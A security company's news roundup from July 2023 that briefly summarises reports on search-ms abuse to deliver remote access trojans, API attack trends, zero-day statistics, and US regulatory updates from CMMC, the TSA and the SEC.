Project Hyphae

Information Security News 7-31-2023

Share This Post

Hackers Abusing Windows Search Feature to Install Remote Access Trojans

Article Link:

  • According to Trellix, a legitimate Windows search feature, search-ms URI protocol handler, is being exploited by unknown malicious actors to download arbitrary payloads from remote servers and compromise targeted systems with remote access trojans, such as AsyncRAT and Remcos RAT.
  • In many of the attacks, bad actors send phishing HTML attachments leading to compromised websites that use JavaScript to exploit the Windows feature.
  • Researchers noted that malicious hackers have also tried putting dangerous links in PDFs and other shared files to create the illusion of security.

Why API Attacks are Increasing and How to Avoid Them

Article Link:

  • As the adoption of APIs (Application Programming Interfaces) grows, the amount of attacks against APIs by malicious actors does too.
  • The article highlights that API attacks are increasing due to several reasons. These include APIs being exposed to network requests which expand the attack surface, APIs intentionally being easy to find and use, companies deploying cloud-based applications with many small components, potentially malicious data being transmitted in pieces, and APIs being easy enough to be deployed that IT teams often aren’t informed of their usage.
  • Issues with authorization and authentication further degrade the security of APIs. As a result of the multitude of issues around APIs, many organizations are looking towards automation platforms to manage the multitude of APIs present.

In 2022, More Than 40% of Zero-Day Exploits Used in the Wild Were Variations of Previous Issues

Article Link:

  • According to Google Threat Analysis Group researchers, more than 40% of zero-day exploits used in the wild were variations of previous issues. Google’s data identified 41 zero days, 17 of which were fixed previously.
  • Google noted that the amount of zero days dropped presumably due to an increase in no-click exploits and new browser extension mitigations designed to circumvent malicious users.
  • Maddie Stone, one of Google’s researchers, encourages vendors to provide patches and mitigations to end-users as fast as possible and suggests that developers share more details about the root causes of the flaws.

DOD, OMB Expect September Release of Proposed CMMC Rule

Article Link:

  • The Department of Defense and Office of Management and Budget (OMB) have updated the timeline for the new proposed CMMC rules to be released in September 2023. 
  • It was noted that the OMB received the proposed rule to begin the reviewal process on July 24th, suggesting that the initial ruleset release and request for comment period will arrive soon.
  • Once the rules are opened for public comment, the final rulemaking process will take at least another 6 months to complete. As such, the final CMMC rules are set to be released in mid-2024, at the earliest.

TSA Updates Pipeline Cybersecurity Requirements

Article Link:

  • The Transportation Security Administration has recently released an updated version of cybersecurity requirements for oil, natural gas, and other hazardous materials pipeline owners and operators.
  • Remaining in place are previous requirements to report significant cybersecurity incidents to CISA, identify a cybersecurity point of contact, and conduct a cybersecurity vulnerability assessment.
  • Updates are as follows: Pipeline owners and operators must establish and implement a TSA-approved Cybersecurity Implementation Plan, develop and maintain an incident response plan, and develop a Cybersecurity Assessment Plan. The Cybersecurity Assessment Plan must be submitted to the TSA for review and approval annually, show results from previous years with a schedule for assessing and auditing security measures, and test at least two Cyber Incident Response Plan (CIRP) objectives annually. Additionally, 100% of all cybersecurity measures must be assessed every three years.
  • Link to the TSA’s Revisions:
  • Link to the TSA’s Cybersecurity Toolkit:

SEC Issues Final Rules on Cybersecurity Disclosure for Public Companies

Article Link:

  • The SEC adopted final rules relating to the cybersecurity disclosures of public companies. Several rules were adopted, the most prominent being that material cybersecurity incidents must be reported within four days and that there must be an annual disclosure of a company’s processes to address material cybersecurity risks.
  • The reporting rules will come into effect either 90 days after publication in the Federal Register or December 18, 2023, whichever is later with longer extensions for smaller organizations. Likewise, the disclosures will be required in annual reports for fiscal years ending on or after December 15, 2023.
  • The rules also received a number of changes prior to the final adoption. These include a narrowing of the scope for incident disclosure, addition of a limited delay for disclosures that have national security or public safety risk, and removal of the disclosure of board cybersecurity expertise.
  • Link to the SEC’s Final Rules:

Why CISOs Should Get Involved with Cyber Insurance Negotiation

Article Link:

  • While CISOs often are included in cyber insurance discussions at large companies, small and some midsize organizations might not have a corporate CISO position and are thus at a disadvantage, especially if there is an insurance claim.
  • Essentially, without IT or Security personnel at the table, organizations often have non-technology personnel addressing cybersecurity issues, adding risk to organizations rather than transferring it.
  • When organizations fail to answer cyber insurance applications accurately, they risk having claims denied or having the insurer sue them. As such, it is vital that the personnel interacting with cyber insurance at a contractual level, typically a finance leader or a general counsel, are working closely with technical personnel.

Reach out to our incident response team for help

More To Explore

CVE-2024-3596 | Attackers Blasting RADIUS

CVE-2024-3596 | CVSS:9.0 A new and emerging attacked named “Blast-RADIUS”, allows a man-in-the-middle attack between the RADIUS client and server to forge a valid protocol

Do You Want to Shore Up Your Defenses?

We're opening our first round of threat hunting engagements to 100 organizations. Sign up or join the wait list here.